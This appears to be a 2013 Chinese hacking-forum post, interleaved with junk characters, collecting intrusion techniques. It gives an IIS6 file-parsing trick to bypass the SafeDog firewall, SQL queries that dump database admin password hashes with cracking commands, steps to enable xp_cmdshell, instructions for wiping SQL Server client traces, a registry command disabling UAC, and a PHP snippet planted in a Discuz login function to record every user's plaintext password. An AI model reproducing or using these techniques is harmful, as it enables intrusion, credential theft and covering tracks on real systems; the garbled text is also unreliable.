. V, j, t( s( u( Y利用II6文件解析漏洞绕过安全狗代码:
+ j7 m! L0 U4 G;antian365.asp;antian365.jpg
7 q [2 X4 P+ L0 ~' @. _2 B2 q7 ^/ U, p( e4 _$ Q6 h
各种类型数据库抓HASH破解最高权限密码!
9 p0 a6 R6 V- X5 i9 w1.sql server20005 e/ X8 F, H: Y' ?; M4 c8 |, O
SELECT password from master.dbo.sysxlogins where name='sa'
7 B: J( x5 A9 |& Z. o/ v4 l; f0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
3 h/ a# r% P0 b! K* [+ l( [2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
G& y n; M7 x' U* D# S" L& d
3 w4 ?7 o9 g, D ]% H0×0100- constant header
A" [. {6 f4 ?6 L( }34767D5C- salt
* x/ K9 a2 T4 R# }' m4 T. O0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
+ o( P% [' t+ T; d2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
' z% ?4 T" G V& g, }crack the upper case hash in ‘cain and abel’ and then work the case sentive hash) T2 V M4 l. x9 I
SQL server 2005:-
4 @5 K8 F. o- S! ZSELECT password_hash FROM sys.sql_logins where name='sa'
! T5 R0 a- B1 y4 @' O& i, F- t0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
1 p8 @8 ~% Z" R% U! Y$ ]2 i! t+ f; M0×0100- constant header
* N& P) g, n3 i1 p% R' ?4 ^993BF231-salt/ K) k3 V9 N2 z
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash3 g+ V& g4 O8 A9 C. N# k2 G
crack case sensitive hash in cain, try brute force and dictionary based attacks.$ ~/ d1 l% G/ w! D
4 \' o0 l! |: t# Q5 f. r: P. b" F& O
update:- following bernardo’s comments:-! M& H3 P' Y0 l; X& \' `
use function fn_varbintohexstr() to cast password in a hex string.3 e8 g1 c# g% x, o1 d8 [" l A
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
' ^5 }* D N, g E5 r) b- B5 _ ~
MYSQL:-
A+ } l% T( V* H: p! N6 L" L* W. x% u) z. I4 M1 K! a3 {
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.3 [9 a7 G$ J0 _9 m A/ r6 a V; z
3 [6 f- d9 ^9 Q+ c& h4 E
*mysql < 4.1
) F {; t" J! l7 _7 M7 T5 T1 R& D8 p+ M* X5 b7 f" O% u4 b# q
mysql> SELECT PASSWORD(‘mypass’);5 ^2 H8 C( K- h6 A3 ~2 u
+——————–+7 r- _8 q6 t* k( u; B" G* f* \
| PASSWORD(‘mypass’) |
7 X7 a: O, d; o& @9 x+——————–+6 n- e* t: r) ^0 B9 U
| 6f8c114b58f2ce9e |
8 R, [5 `- E/ A9 a. A$ `+ _! M+——————–+8 D# _1 f: e, c. I) c
Q5 x0 e, N1 O& T4 Q$ ]" e# Y" \
*mysql >=4.1
* B+ `* d @8 q, W. ?1 b7 D$ n
# q+ A6 {1 q8 xmysql> SELECT PASSWORD(‘mypass’);4 ?( @ n H0 {$ |* Y
+——————————————-+
) J: N' d( \: I| PASSWORD(‘mypass’) |( w2 C K/ |+ @/ E+ Q [$ e& R
+——————————————-+# R! h1 c& V- y* F: k
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |4 _4 ]3 p: W# j& i4 w b1 a* z
+——————————————-+! f, {+ c R; D" y
9 @. k* ~7 L- {3 h
Select user, password from mysql.user/ F: Q8 Q9 ^1 e: m% y/ D
The hashes can be cracked in ‘cain and abel’
9 H/ ]/ e; C- I2 x
+ _5 v; m o `% G* k5 JPostgres:-
u1 j2 W+ \4 i% b J& @5 H7 @Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
( i Q0 v, [$ x/ ?select usename, passwd from pg_shadow;
, f' |7 D9 Y4 ]usename | passwd+ \" [6 }/ P" I5 Q6 [. l
——————+————————————-
, B( c9 ^6 l" ftestuser | md5fabb6d7172aadfda4753bf0507ed43967 C* f9 t. ]; W& S
use mdcrack to crack these hashes:-6 v) U! u6 @6 O+ m8 s: M
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396' [+ o' M! @0 Z" G) v' |
9 E2 v7 c: ] hOracle:-
5 U4 p6 `$ `: J( tselect name, password, spare4 from sys.user$
, \& J2 |" \( W' k1 s- Uhashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
5 o2 ?9 R8 \% N, ]( }% XMore on Oracle later, i am a bit bored….+ T- r7 h2 Q- F$ A8 f
% ?8 H l; U. g- q. h, |9 i
, D9 l7 e, I- A
在sql server2005/2008中开启xp_cmdshell
7 y9 a" X4 O& z9 ^% E. R8 t6 l-- To allow advanced options to be changed.
" O9 F4 O1 j* }0 z, WEXEC sp_configure 'show advanced options', 1
6 q5 g) b, w$ V, k5 i* T1 EGO
/ S- B5 R# ~, j h-- To update the currently configured value for advanced options.
) h- s) h2 z. x: p4 \' p+ B* j% @RECONFIGURE1 p6 W- u; O) h
GO4 D, }" {) ]- G! X6 ~. e! D
-- To enable the feature./ R5 q" r6 n0 o- |5 l& m
EXEC sp_configure 'xp_cmdshell', 11 S& s$ {- r' u! M% `+ |9 ~2 X0 n
GO
5 J3 i/ p- p7 v- j4 {' d. v7 Q-- To update the currently configured value for this feature.& y% O+ n2 z5 |6 G
RECONFIGURE% {9 s/ O6 r2 Z, S; Z
GO( `5 U8 X8 I9 N- W3 L
SQL 2008 server日志清除,在清楚前一定要备份。
* Q) s9 ? k9 b. }. S# P& P如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
; P% b) h9 G( i- m& ]; hX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
8 O' i& }9 \9 O% p6 t7 F5 V& O1 }. Y$ x
对于SQL Server 2008以前的版本:- G- J5 u: F* g) p
SQL Server 2005:! S# f, x; ~! h3 c! f8 L
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
. ]: f% A. c) G1 B4 wSQL Server 2000:
: @ w$ @: A: E* e+ ~( U5 ~1 {2 d; X清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。+ S# E& D0 p& h e
\9 O+ i4 ~2 o1 v0 [" M$ d* ^1 n" M
本帖最后由 simeon 于 2013-1-3 09:51 编辑0 u& b- i4 r! l' y% n/ T9 v
+ h; F2 Z4 I; y- I
6 Q& d" F6 e W0 J, v! G
windows 2008 文件权限修改
% r1 U' ]7 V. F8 ? {. T( \5 U7 ]1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
4 _) N3 Y/ f& }0 P+ W2 [' c! r2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
$ ~" z* @8 F( {" d U1 Z一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
: @# {4 U/ S" A' ` T. l
* Z) ]0 h/ [( y0 zWindows Registry Editor Version 5.00
8 n. y: j9 u* C. k+ t2 Q[HKEY_CLASSES_ROOT\*\shell\runas]4 Q8 s- o0 S) t& r' a' s% X# N9 f. c
@="管理员取得所有权"
+ ?5 E: ?6 i. W"NoWorkingDirectory"=""
* i" a L1 k9 p3 A0 |6 N[HKEY_CLASSES_ROOT\*\shell\runas\command]
' {. F' c% ?; o( w@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"* @5 _: M- Y/ p; [
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F": Z4 ~ c& w3 Q8 G* c' Q# E
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
, H: [* N/ z4 g@="管理员取得所有权"; H. I% W" b s: g! F& w, {! ?
"NoWorkingDirectory"=""' _- [ P$ F3 ?' z. l! |1 z
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
, I8 j0 h% c) n! i0 U5 ?+ E3 ^4 F@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
. z& o: C$ n+ z% o) v5 o"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"5 a2 w) \$ o# {- |% e }
: Q' O! s5 {! D f R5 K[HKEY_CLASSES_ROOT\Directory\shell\runas]9 j* P% _+ ]% Z, ^; H! l5 T4 V; X
@="管理员取得所有权"
$ m: h4 T' l9 C: R( Z"NoWorkingDirectory"="". G; E) u$ v/ U+ j
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
6 [" ?; ?1 p5 }' q) {4 c@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"" V& C. y! V9 [: S
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
% y* z& p5 M; i3 S, v7 Q8 _: ]9 o$ v& X, P( J) |, W; K
1 x' L9 p& W8 [& o9 owin7右键“管理员取得所有权”.reg导入
/ s J6 B& m b9 k$ v' N8 q二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,9 z7 t4 r. K) Z! P2 a: h$ [$ R
1、C:\Windows这个路径的“notepad.exe”不需要替换
1 X- z5 v( Z, V, w6 l4 E6 P+ C' Q2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
: V5 f% u7 M" N- ?- s0 A" T9 Q& q3、四个“notepad.exe.mui”不要管6 r$ h- Z& a( y
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和5 w$ _0 W8 h- A
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
. c* b+ f Z4 [) a# ^) p替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
* ^0 M, h2 N4 n1 s$ e替换完之后回到桌面,新建一个txt文档打开看看是不是变了。6 p+ l2 Y( U% _+ V: ~" H
windows 2008中关闭安全策略:
& }2 e A. h% ^, hreg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
+ J+ M2 Q" g j. W4 P2 S修改uc_client目录下的client.php 在
9 H" i: R/ k5 @/ a2 A+ ?/ wfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
: A9 N+ D) V6 e3 t( _# U( _下加入如上代码,在网站./data/cache/目录下自动生成csslog.php5 a! g3 ^5 Y/ ^( T
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
1 j' X# |+ A. @, @* Pif(getenv('HTTP_CLIENT_IP')) {
2 H9 A2 }; Z' d6 B$onlineip = getenv('HTTP_CLIENT_IP');
+ A) w+ C& }+ X! W' v9 F X7 e. A} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
! A' I" T; T: i' Q2 n0 Y! z) P$onlineip = getenv('HTTP_X_FORWARDED_FOR');) Q; h4 ?, R! }5 E5 U
} elseif(getenv('REMOTE_ADDR')) {2 X, k9 a {3 r) d/ N* F" I# I. w
$onlineip = getenv('REMOTE_ADDR');
# ]' x2 Z- E5 @& V} else {
; h. B! ^. I! Z$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
/ Y \, C; i1 s' Q( ]7 e}
. ? u$ J% b! q $showtime=date("Y-m-d H:i:s");
! x+ t! \( Z. i: W1 ` $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";1 t: t4 N2 U. z3 F
$handle=fopen('./data/cache/csslog.php','a+');: t# S3 b- s1 x
$write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对